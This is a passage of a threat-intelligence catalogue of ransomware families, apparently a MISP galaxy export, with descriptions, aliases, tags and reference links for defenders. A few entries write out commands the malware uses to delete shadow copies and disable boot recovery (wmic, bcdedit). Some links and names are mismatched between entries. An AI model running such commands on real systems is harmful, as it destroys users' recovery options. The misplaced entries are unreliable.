This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc. This ransomware poses at MSOffice to fool
users into opening the infected file. GO Ransomware

The tag is: `misp-galaxy:ransomware="Vanguard Ransomware"`

**Table 5016. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/vanguard-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/vanguard-ransomware.html</a></td>
<td></td>
</tr>
<tr>
<td><a href="https://twitter.com/JAMESWT_MHT/status/834783231476166657">https://twitter.com/JAMESWT_MHT/status/834783231476166657</a></td>
<td></td>
</tr>
</tbody>
</table>

**PyL33T Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="PyL33T Ransomware"`

**Table 5017. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/pyl33t-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/pyl33t-ransomware.html</a></td>
<td></td>
</tr>
<tr>
<td><a href="https://twitter.com/Jan0fficial/status/834706668466405377">https://twitter.com/Jan0fficial/status/834706668466405377</a></td>
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</tr>
</tbody>
</table>

**TrumpLocker Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. This is the old VenusLocker in disguise .To delete shadow files use the following commend: `C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit`  

The tag is: `misp-galaxy:ransomware="TrumpLocker Ransomware"`

**Table 5018. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html">https://id-ransomware.blogspot.co.il/2017/02/trumplocker.html</a></td>
<td></td>
</tr>
</tbody>
</table>
**Damage Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Written in Delphi

The tag is: `misp-galaxy:ransomware="Damage Ransomware"`

**Table 5019. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/damage-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/damage-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://decrypter.emsisoft.com/damage">https://decrypter.emsisoft.com/damage</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/demonslay335/status/835664067843014656">https://twitter.com/demonslay335/status/835664067843014656</a></td>
</tr>
</tbody>
</table>

**XYZWare Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: `misp-galaxy:ransomware="XYZWare Ransomware"`

**Table 5020. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/xyzware-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/xyzware-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/833636006721122304">https://twitter.com/malwrhunterteam/status/833636006721122304</a></td>
</tr>
</tbody>
</table>

**YouAreFucked Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="YouAreFucked Ransomware"`

YouAreFucked Ransomware is also known as:

- FortuneCrypt

**Table 5021. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://www.enigmasoftware.com/youarefuckedransomware-removal/">https://www.enigmasoftware.com/youarefuckedransomware-removal/</a></td>
</tr>
</tbody>
</table>
CryptConsole 2.0 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="CryptConsole 2.0 Ransomware"*

<table>
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<th>Table 5022. Table References</th>
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<tr>
<td><strong>Links</strong></td>
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<td><a href="https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/cryptconsole-2-ransomware.html</a></td>
</tr>
</tbody>
</table>

BarRax Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: *misp-galaxy:ransomware="BarRax Ransomware"*

BarRax Ransomware is also known as:

- BarRaxCrypt Ransomware

<table>
<thead>
<tr>
<th>Table 5023. Table References</th>
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<tbody>
<tr>
<td><strong>Links</strong></td>
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<td><a href="https://id-ransomware.blogspot.co.il/2017/02/barraxcrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/barraxcrypt-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/demonslay335/status/835668540367777792">https://twitter.com/demonslay335/status/835668540367777792</a></td>
</tr>
</tbody>
</table>

CryptoLocker by NTK Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="CryptoLocker by NTK Ransomware"*

<table>
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<tr>
<th>Table 5024. Table References</th>
</tr>
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<tbody>
<tr>
<td><strong>Links</strong></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/cryptolocker-by-ntk-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/cryptolocker-by-ntk-ransomware.html</a></td>
</tr>
</tbody>
</table>
UserFilesLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="UserFilesLocker Ransomware"

UserFilesLocker Ransomware is also known as:

• CzechoSlovak Ransomware

Table 5025. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/userfileslocker-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/userfileslocker-ransomware.html</a></td>
</tr>
</tbody>
</table>

AvastVirusinfo Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. PAYING RANSOM IS USELESS, YOUR FILES WILL NOT BE FIXED. THE DAMAGE IS PERMENENT!!!!

The tag is: misp-galaxy:ransomware="AvastVirusinfo Ransomware"

Table 5026. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017_03_01_archive.html">https://id-ransomware.blogspot.co.il/2017_03_01_archive.html</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/03/avastvirusinfo-ransomware.html">https://id-ransomware.blogspot.co.il/2017/03/avastvirusinfo-ransomware.html</a></td>
</tr>
</tbody>
</table>

SuchSecurity Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="SuchSecurity Ransomware"

SuchSecurity Ransomware is also known as:

• Such Security

Table 5027. Table References
PleaseRead Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="PleaseRead Ransomware"`

PleaseRead Ransomware is also known as:

- VHDLocker Ransomware

Table 5028. Table References

Links

https://id-ransomware.blogspot.co.il/2017/03/suchsecurity-ransomware.html

Kasiski Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Kasiski Ransomware"`

Table 5029. Table References

Links

https://id-ransomware.blogspot.co.il/2017/02/vhd-ransomware.html

https://twitter.com/MarceloRivero/status/832302976744173570


Fake Locky Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Fake Locky Ransomware"`

Fake Locky Ransomware is also known as:

- Locky Impersonator Ransomware
CryptoShield 1.0 Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoShield 1.0 is a ransomware from the CryptoMix family.

The tag is: misp-galaxy:ransomware="CryptoShield 1.0 Ransomware"

Hermes Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Filemarker: "HERMES"

The tag is: misp-galaxy:ransomware="Hermes Ransomware"

Hermes Ransomware has relationships with:

- similar: misp-galaxy:malpedia="Hermes Ransomware" with estimative-language:likelihood-probability="likely"
LoveLock Ransomware or Love2Lock Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="LoveLock Ransomware or Love2Lock Ransomware"`

LoveLock Ransomware or Love2Lock Ransomware is also known as:

- LoveLock
- Love2Lock

Table 5033. Table References

<table>
<thead>
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<th>Links</th>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/lovelock-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/lovelock-ransomware.html</a></td>
</tr>
</tbody>
</table>

Wcry Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Wcry Ransomware"`

Table 5034. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/wcry-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/wcry-ransomware.html</a></td>
</tr>
</tbody>
</table>

DUMB Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="DUMB Ransomware"`

Table 5035. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/02/dumb-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/dumb-ransomware.html</a></td>
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<tr>
<td><a href="https://twitter.com/bleepingcomputer/status/816053140147597312?lang=en">https://twitter.com/bleepingcomputer/status/816053140147597312?lang=en</a></td>
</tr>
</tbody>
</table>
X-Files

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="X-Files"`

Table 5036. Table References

<table>
<thead>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017_02_01_archive.html">https://id-ransomware.blogspot.co.il/2017_02_01_archive.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/x-files-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/x-files-ransomware.html</a></td>
</tr>
</tbody>
</table>

Polski Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The Ransom is 249$ and the hacker demands that the victim gets in contact through e-mail and a Polish messenger called Gadu-Gadu.

The tag is: `misp-galaxy:ransomware="Polski Ransomware"`

Table 5037. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/polski-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/polski-ransomware.html</a></td>
</tr>
</tbody>
</table>

YourRansom Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This hacker demands that the victim contacts him through email and decrypts the files for FREE.(moreinfo in the link below)

The tag is: `misp-galaxy:ransomware="YourRansom Ransomware"`

Table 5038. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/yourransom-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/_ddoxer/status/827555507741274113">https://twitter.com/_ddoxer/status/827555507741274113</a></td>
</tr>
</tbody>
</table>
Ranion RaasRansomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ranion Raas gives the opportunity to regular people to buy and distribute ransomware for a very cheap price. (More info in the link below). RaaS service

The tag is: `misp-galaxy:ransomware="Ranion RaasRansomware"`

<table>
<thead>
<tr>
<th>Table 5039. Table References</th>
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<td><a href="https://id-ransomware.blogspot.co.il/2017/02/ranion-raas.html">https://id-ransomware.blogspot.co.il/2017/02/ranion-raas.html</a></td>
</tr>
</tbody>
</table>

Potato Ransomware

Wants a ransom to get the victim's files back. Originated in English. Spread worldwide.

The tag is: `misp-galaxy:ransomware="Potato Ransomware"

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<thead>
<tr>
<th>Table 5040. Table References</th>
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<tbody>
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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/polato-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/polato-ransomware.html</a></td>
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</tbody>
</table>

of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)

This ransomware is originated in English, therefore could be used worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

The tag is: `misp-galaxy:ransomware="of Ransomware: OpenToYou (Formerly known as OpenToDecrypt)"

<table>
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<th>Table 5041. Table References</th>
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<tr>
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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/opentodecrypt-ransomware.html</a></td>
</tr>
</tbody>
</table>

RansomPlus

Author of this ransomware is sergej. Ransom is 0.25 bitcoins for the return of files. Originated in English. Used worldwide. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.
The tag is: misp-galaxy:ransomware="RansomPlus"

Table 5042. Table References

<table>
<thead>
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<th>Links</th>
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<tr>
<td><a href="http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html">http://www.2-spyware.com/remove-ransomplus-ransomware-virus.html</a></td>
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<td><a href="https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/ransomplus-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/jiriatvirlab/status/825411602535088129">https://twitter.com/jiriatvirlab/status/825411602535088129</a></td>
</tr>
</tbody>
</table>

CryptConsole

This ransomware does not actually encrypt your file, but only changes the names of your files, just like Globe Ransomware. This ransomware is spread with the help of email spam, fake ads, fake updates, infected install files

The tag is: misp-galaxy:ransomware="CryptConsole"

Table 5043. Table References

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<thead>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/cryptconsole-ransomware.html</a></td>
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<td><a href="https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/">https://www.bleepingcomputer.com/forums/t/638344/cryptconsole-uncrypteoutlookcom-support-topic-how-decrypt-fileshta/</a></td>
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<td><a href="https://twitter.com/PolarToffee/status/824705553201057794">https://twitter.com/PolarToffee/status/824705553201057794</a></td>
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<tr>
<td><a href="https://twitter.com/demonslay335/status/1004351990493741057">https://twitter.com/demonslay335/status/1004351990493741057</a></td>
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<tr>
<td><a href="https://twitter.com/demonslay335/status/1004803373747572736">https://twitter.com/demonslay335/status/1004803373747572736</a></td>
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</tbody>
</table>

ZXZ Ramsomware

Originated in English, could affect users worldwide, however so far only reports from Saudi Arabia. The malware name founded by a windows server tools is called win32/wagcrypt.A

The tag is: misp-galaxy:ransomware="ZXZ Ramsomware"

Table 5044. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/01/zxz-ransomware.html">https://id-ransomware.blogspot.co.il/2017/01/zxz-ransomware.html</a></td>
</tr>
</tbody>
</table>

VxLock Ransomware

Developed in Visual Studios in 2010. Original name is VxCrypt. This ransomware encrypts your files, including photos, music, MS office, Open Office, PDF... etc
FunFact Ransomware

Funfact uses an open code for GNU Privacy Guard (GnuPG), then asks to email them to find out the amount of bitcoin to send (to receive a decrypt code). Written in English, can attach all over the world. The ransom is 1.22038 BTC, which is 1100USD.

ZekwaCrypt Ransomware

First spotted in May 2016, however made a big comeback in January 2017. It’s directed to English speaking users, therefore is able to infect worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.

Sage 2.0 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. This ransomware attacks your MS Office by offering a Micro to help with your program, but instead incrypts all your files if the used id not protected. Predecessor CryLocker
CloudSword Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. Uses the name “Window Update” to confuse its victims. Then imitates the window update process, while turning off the Window Startup Repair and changes the BootStatusPolicy using these commands:

```
bcdedit.exe /set {default} recoveryenabled No
bcdedit.exe /set {default} bootstatuspolicy ignoredfailures
```

The tag is: *misp-galaxy:ransomware=“CloudSword Ransomware”*

Table 5049. Table References

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<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/01/cloudsword.html">https://id-ransomware.blogspot.co.il/2017/01/cloudsword.html</a></td>
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<td><a href="https://twitter.com/BleepinComputer/status/822653335681593345">https://twitter.com/BleepinComputer/status/822653335681593345</a></td>
</tr>
</tbody>
</table>

DN

It's directed to English speaking users, therefore is able to infect worldwide. Uses the name “Chrome Update” to confuse its victims. Then imitates the chrome update process, while encrypting the files. DO NOT pay the ransom, since YOUR COMPUTER WILL NOT BE RESTORED FROM THIS MALWARE!!!!

The tag is: *misp-galaxy:ransomware=“DN”*

DN is also known as:

- Fake

Table 5050. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/01/dn-donotopen.html">https://id-ransomware.blogspot.co.il/2017/01/dn-donotopen.html</a></td>
</tr>
</tbody>
</table>

GarryWeber Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. Its original name is FileSpy and FileSpy Application. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including: music, MS Office, etc.
Satan Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. Its original name is RAAS RANSOMWARE. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, Open Office, pictures etc.. This ransomware promotes other to download viruses and spread them as ransomware to infect other users and keep 70% of the ransom. (leaving the other 30% to Satan) https://3.bp.blogspot.com/-7fwX40eYL18/WH-tfpNjdG/AAAAAAAADP/kKVP_ji8IR0gENCMDYh324mfzIFpiaOwACLcB/s1600/site-raas.gif

The tag is: *misp-galaxy:ransomware="Satan Ransomware"*

Satan Ransomware has relationships with:

- similar: misp-galaxy:malpedia="Satan Ransomware" with estimative-language:likelihood-probability="likely"

Havoc

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware="Havoc"*

Havoc is also known as:

- HavocCrypt Ransomware
CryptoSweetTooth Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Its fake name is Bitcoin and maker's name is Santiago. Work of the encrypted requires the user to have .NET Framework 4.5.2. on his computer.

The tag is: misp-galaxy:ransomware="CryptoSweetTooth Ransomware"

Kaandsona Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The word Kaandsona is Estonian, therefore the creator is probably from Estonia. Crashes before it encrypts

The tag is: misp-galaxy:ransomware="Kaandsona Ransomware"

Kaandsona Ransomware is also known as:

- RansomTroll Ransomware
- Käändsõna Ransomware

LambdaLocker Ransomware

It's directed to English and Chinese speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware

The tag is: misp-galaxy:ransomware="LambdaLocker Ransomware"
NMoreia 2.0 Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="NMoreia 2.0 Ransomware"`

NMoreia 2.0 Ransomware is also known as:

- HakunaMatataRansomware

**Table 5057. Table References**

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/01/hakunamatata.html">https://id-ransomware.blogspot.co.il/2017/01/hakunamatata.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016_03_01_archive.html">https://id-ransomware.blogspot.co.il/2016_03_01_archive.html</a></td>
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</table>

Marlboro Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is .2 bitcoin, however there is no point of even trying to pay, since this damage is irreversible. Once the ransom is paid the hacker does not return decrypt the files. Another name is DeMarlboro and it is written in language C++. Pretend to encrypt using RSA-2048 and AES-128 (really it’s just XOR)

The tag is: `misp-galaxy:ransomware="Marlboro Ransomware"`

**Table 5058. Table References**

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/01/marlboro.html">https://id-ransomware.blogspot.co.il/2017/01/marlboro.html</a></td>
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<tr>
<td><a href="https://decrypter.emsisoft.com/marlboro">https://decrypter.emsisoft.com/marlboro</a></td>
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</table>

Spora Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of a spam email with a viral attachment: [https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/](https://4.bp.blogspot.com/-KkJXiHG80S0/WHX4TBpkamI/AAAAAAAADDg/)
The tag is: **misp-galaxy:ransomware="Spora Ransomware"**

### CryptoKill Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files get encrypted, but the decrypt key is not available. **NO POINT OF PAYING THE RANSOM, THE FILES WILL NOT BE RETURNED.**

The tag is: **misp-galaxy:ransomware="CryptoKill Ransomware"**

### All_Your_Documents Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: **misp-galaxy:ransomware="All_Your_Documents Ransomware"**

### SerbRansom 2017 Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 500$ in bitcoins. The name of the hacker is R4z0rx0r Serbian Hacker.

The tag is: **misp-galaxy:ransomware="SerbRansom 2017 Ransomware"**
Fadesoft Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 0.33 bitcoins.

The tag is: misp-galaxy:ransomware="Fadesoft Ransomware"

HugeMe Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="HugeMe Ransomware"

DynA-Crypt Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="DynA-Crypt Ransomware"
DynA-Crypt Ransomware is also known as:

- DynA CryptoLocker Ransomware

Table 5065. Table References

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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/dyna-crypt-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/dyna-crypt-ransomware.html</a></td>
</tr>
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</table>

**Serpent 2017 Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Serpent 2017 Ransomware"

Serpent 2017 Ransomware is also known as:

- Serpent Danish Ransomware

Table 5066. Table References

<table>
<thead>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2017/02/serpent-danish-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/serpent-danish-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Erebus 2017 Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Erebus 2017 Ransomware"

Table 5067. Table References

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<td><a href="https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html">https://id-ransomware.blogspot.co.il/2017/02/erebus-2017-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Cyber Drill Exercise**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Cyber Drill Exercise is also known as:

- Ransomuhahawhere

**Cancer Ransomware FAKE**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. This is a trollware that does not encrypt your files but makes your computer act crazy (like in the video in the link below). It is meant to be annoying and it is hard to erase from your PC, but possible.

**UpdateHost Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Poses as Microsoft Copyright 2017 and requests ransom in bitcoins.

**Nemesis Ransomware**

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 10 bitcoins.
Evil Ransomware

It's directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc. Domain KZ is used, therefore it is assumed that the decrypter is from Kazakhstan. Coded in Javascript

Evil Ransomware is also known as:

- File0Locked KZ Ransomware

Ocelot Ransomware (FAKE RANSOMWARE)

It's directed to English speaking users, therefore is able to infect worldwide. This is a fake ransomware. Your files are not really encrypted, however the attacker does ask for a ransom of .03 bitcoins. It is still dangerous even though it is fake, he still go through to your computer.

Ocelot Ransomware (FAKE RANSOMWARE) is also known as:

- Ocelot Locker Ransomware
SkyName Ransomware

It’s directed to Czechoslovakianspeaking users. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear

The tag is: \texttt{misp-galaxy:ransomware=SkyName Ransomware}

SkyName Ransomware is also known as:

• Blablabla Ransomware

\textbf{Table 5074. Table References}

\begin{tabular}{|l|}
\hline
Links \\
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https://id-ransomware.blogspot.co.il/2017/01/skynameransomware.html \\
https://twitter.com/malwrhunterteam/status/817079028725190656 \\
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\end{tabular}

MafiaWare Ransomware

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 155$ inbitcoins. Creator of ransomware is called Mafia. Based on HiddenTear

